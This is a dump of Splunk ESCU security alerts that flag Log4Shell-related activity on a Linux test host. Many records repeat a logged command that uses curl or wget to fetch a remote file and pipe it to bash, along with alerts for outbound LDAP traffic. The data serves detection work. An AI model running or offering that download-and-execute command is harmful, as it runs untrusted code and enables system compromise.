annotations._all="Ingress Tool Transfer", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638101", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:21:41", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="8018", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642639716, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Ingress Tool Transfer", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638101", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:21:41", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="8018", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642639716, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Ingress Tool Transfer", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633814", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:14", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7877", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642639716, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Ingress Tool Transfer", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633814", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:14", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7877", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642639716, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Ingress Tool Transfer", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633812", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:12", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7870", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642639716, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Ingress Tool Transfer", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633812", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:12", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7870", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642639716, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Ingress Tool Transfer", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631700", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:35:00", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7798", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642639716, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Ingress Tool Transfer", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631700", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:35:00", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7798", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642639457, search_name="ESCU - Detect Outbound LDAP Traffic - Rule", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 12\",\"CIS 13\"],\"context\":[\"Source:Endpoint\",\"Stage:Initial Access\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Command and Control\",\"Actions on Objectives\"],\"mitre_attack\":[\"T1190\",\"T1059\"],\"nist\":[\"PR.DS\",\"PR.PT\",\"DE.AE\",\"DE.CM\"],\"observable\":[]}", annotations._all="CIS 13", annotations._all="Stage:Initial Access", annotations._all="Source:Endpoint", annotations._all="T1059", annotations._all="PR.PT", annotations._all="Log4Shell CVE-2021-44228", annotations._all="PR.DS", annotations._all="DE.CM", annotations._all="CIS 12", annotations._all="Command and Control", annotations._all="T1190", annotations._all="CVE-2021-44228", annotations._all="DE.AE", annotations._all="Actions on Objectives", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 12", annotations.cis20="CIS 13", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Command and Control", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1190", annotations.mitre_attack="T1059", annotations.nist="PR.DS", annotations.nist="PR.PT", annotations.nist="DE.AE", annotations.nist="DE.CM", dest_ip="0:0:0:0:0:ffff:a00:110", earliest_time="2022-01-19T22:34:59", info_max_time="+Infinity", info_min_time="0.000", latest_time="2022-01-20T00:21:41", risk_message="An outbound LDAP connection from 0:0:0:0:0:ffff:a00:114 in your infrastructure connecting to dest ip 0:0:0:0:0:ffff:a00:110", risk_object="0:0:0:0:0:ffff:a00:110", risk_object_type="system", risk_score="56.0", savedsearch_description="Malicious actors often abuse misconfigured LDAP servers or applications that use the LDAP servers in organizations. Outbound LDAP traffic should not be allowed outbound through your perimeter firewall. This search will help determine if you have any LDAP connections to IP addresses outside of private (RFC1918) address space.", src_ip="0:0:0:0:0:ffff:a00:114" 1642639457, search_name="ESCU - Detect Outbound LDAP Traffic - Rule", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 12\",\"CIS 13\"],\"context\":[\"Source:Endpoint\",\"Stage:Initial Access\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Command and Control\",\"Actions on Objectives\"],\"mitre_attack\":[\"T1190\",\"T1059\"],\"nist\":[\"PR.DS\",\"PR.PT\",\"DE.AE\",\"DE.CM\"],\"observable\":[]}", annotations._all="CIS 13", annotations._all="Stage:Initial Access", annotations._all="Source:Endpoint", annotations._all="T1059", annotations._all="PR.PT", annotations._all="Log4Shell CVE-2021-44228", annotations._all="PR.DS", annotations._all="DE.CM", annotations._all="CIS 12", annotations._all="Command and Control", annotations._all="T1190", annotations._all="CVE-2021-44228", annotations._all="DE.AE", annotations._all="Actions on Objectives", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 12", annotations.cis20="CIS 13", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Command and Control", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1190", annotations.mitre_attack="T1059", annotations.nist="PR.DS", annotations.nist="PR.PT", annotations.nist="DE.AE", annotations.nist="DE.CM", dest_ip="0:0:0:0:0:ffff:a00:110", earliest_time="2022-01-19T22:34:59", info_max_time="+Infinity", info_min_time="0.000", latest_time="2022-01-20T00:21:41", risk_message="An outbound LDAP connection from 0:0:0:0:0:ffff:a00:114 in your infrastructure connecting to dest ip 0:0:0:0:0:ffff:a00:110", risk_object="0:0:0:0:0:ffff:a00:114", risk_object_type="system", risk_score="56.0", savedsearch_description="Malicious actors often abuse misconfigured LDAP servers or applications that use the LDAP servers in organizations. Outbound LDAP traffic should not be allowed outbound through your perimeter firewall. This search will help determine if you have any LDAP connections to IP addresses outside of private (RFC1918) address space.", src_ip="0:0:0:0:0:ffff:a00:114" 1642639416, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638231", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:23:51", parent_process_id="8018", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="8020", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642639416, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638231", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:23:51", parent_process_id="8018", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="8020", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642639416, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633944", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:24", parent_process_id="7877", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7879", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642639416, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633944", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:24", parent_process_id="7877", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7879", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642639416, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633942", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:22", parent_process_id="7870", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7872", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642639416, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633942", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:22", parent_process_id="7870", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7872", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642639416, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool 